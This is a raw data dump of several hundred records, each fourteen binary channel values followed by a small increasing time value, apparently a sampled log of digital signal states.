1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.7017492e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7017516e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7017524e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7017540e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7017568e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7017588e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7017616e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7017640e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7017668e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7017692e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7017716e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7017720e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.7017740e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7017768e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7017772e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7017792e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7017816e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7017820e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.7017868e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7017892e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.7017916e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7017940e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7017948e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7017964e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7017988e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7018016e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7018040e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7018068e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7018092e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7018096e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.7018140e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7018164e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7018172e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7018192e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7018216e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7018240e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7018268e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.7018316e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7018340e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7018348e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7018364e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7018388e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7018416e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7018440e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7018468e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7018492e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7018516e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7018540e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7018564e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7018588e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7018616e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7018640e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7018668e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7018692e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7018696e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.7018716e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7018740e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.7018764e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7018788e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.7018816e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7018840e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7018848e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7018892e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7018916e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7018940e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7018964e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7018972e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.7019016e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7019044e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.7019068e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7019092e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7019100e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7019116e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7019140e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7019164e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7019188e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7019216e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7019240e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7019244e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.7019292e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7019316e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7019324e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7019340e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7019364e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7019388e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7019416e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7019440e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7019468e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7019492e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7019516e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7019540e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7019564e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7019588e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7019616e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7019640e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7019668e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7019692e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7019716e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7019740e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7019764e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7019788e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7019816e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7019840e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7019868e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.7019916e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7019940e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7019948e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7019964e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7019988e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7020016e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7020040e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7020068e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7020092e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7020096e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.7020116e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7020140e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7020148e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7020192e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7020216e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7020268e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7020292e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7020316e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7020344e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7020368e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7020396e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.7020416e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7020444e-02 1,0,0,0,1,1,0,0,0,0,0,0,0,0,1.7020448e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7020452e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7020468e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7020492e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7020516e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7020544e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7020548e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.7020596e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7020620e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7020628e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7020644e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7020668e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7020692e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7020716e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7020744e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7020768e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7020796e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7020820e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7020844e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7020868e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7020892e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7020916e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7020944e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7020968e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7020996e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7021020e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7021044e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7021068e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7021092e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7021116e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7021144e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7021168e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7021196e-02 1,0,0,0,1,0,0,0,0,1,0,0,0,0,1.7021220e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7021224e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.7021244e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7021268e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7021276e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7021320e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7021344e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7021396e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7021420e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7021444e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7021468e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7021492e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7021516e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7021524e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.7021544e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7021568e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7021576e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7021596e-02 1,0,0,0,1,0,0,0,0,1,0,0,0,0,1.7021620e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7021624e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.7021668e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7021692e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7021700e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7021716e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7021744e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7021764e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7021788e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7021816e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7021836e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7021864e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7021888e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7021892e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,1.7021940e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7021964e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7021972e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7021988e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7022012e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7022036e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7022064e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7022088e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7022116e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7022140e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7022164e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7022188e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7022212e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7022236e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7022264e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7022288e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7022316e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7022340e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7022364e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7022388e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7022412e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7022436e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7022464e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7022488e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7022516e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7022540e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7022564e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7022588e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7022616e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7022640e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7022668e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7022692e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7022716e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7022740e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7022764e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7022788e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7022816e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7022840e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7022868e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7022892e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7022916e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7022940e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7022964e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7022988e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7023016e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7023040e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7023068e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7023092e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7023116e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7023140e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7023164e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7023188e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7023212e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7023240e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7023268e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7023288e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7023316e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7023340e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7023364e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7023396e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7023420e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7023444e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7023468e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.7023492e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7023516e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7023524e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,1,1.7148068e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,1.7148284e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,1,1.7148308e-02 0,1,0,0,1,1,0,0,0,1,0,1,0,1,1.7148332e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,1,1.7148356e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,1,1.7148700e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,1,1.7148724e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,1,1.7148732e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,1,1.7148752e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,1,1.7148776e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,1,1.7148800e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,1,1.7148828e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,1,1.7148852e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,1,1.7148876e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7148900e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7148924e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7148952e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7148976e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7149004e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7149028e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7149052e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7149076e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7149100e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7149124e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7149148e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7149176e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7149180e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,1.7149228e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7149252e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7149260e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7149276e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7149300e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7149324e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7149352e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7149376e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7149404e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,1.7149452e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7149476e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7149484e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7149500e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7149524e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7149552e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7149576e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7149604e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7149628e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7149652e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7149676e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7149700e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7149724e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7149752e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7149776e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7149780e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,1.7149828e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7149852e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7149860e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7149876e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7149900e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7149924e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7149952e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7149976e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7150004e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7150028e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7150052e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7150056e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,1.7150100e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7150124e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7150132e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7150152e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7150176e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7150200e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7150228e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,1.7150276e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7150300e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7150308e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7150324e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7150352e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7150376e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7150404e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7150428e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7150452e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7150476e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7150500e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7150524e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7150552e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7150576e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7150604e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7150628e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7150652e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7150676e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7150700e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7150724e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7150752e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7150776e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7150804e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,1.7150852e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7150876e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7150884e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7150900e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7150924e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7150932e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,1.7150976e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7151004e-02 0,1,0,0,1,1,0,0,0,0,0,0,0,0,1.7151008e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7151012e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7151028e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7151052e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7151076e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7151100e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7151124e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7151152e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7151176e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7151204e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,1.7151252e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7151276e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7151284e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7151300e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7151324e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7151352e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7151376e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7151404e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7151428e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7151452e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7151476e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7151500e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7151524e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7151552e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7151576e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7151604e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7151628e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7151652e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7151676e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7151700e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7151724e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7151752e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7151776e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7151804e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7151828e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,1.7151876e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7151900e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7151908e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7151924e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7151952e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7151976e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7151996e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7152024e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7152048e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7152076e-02 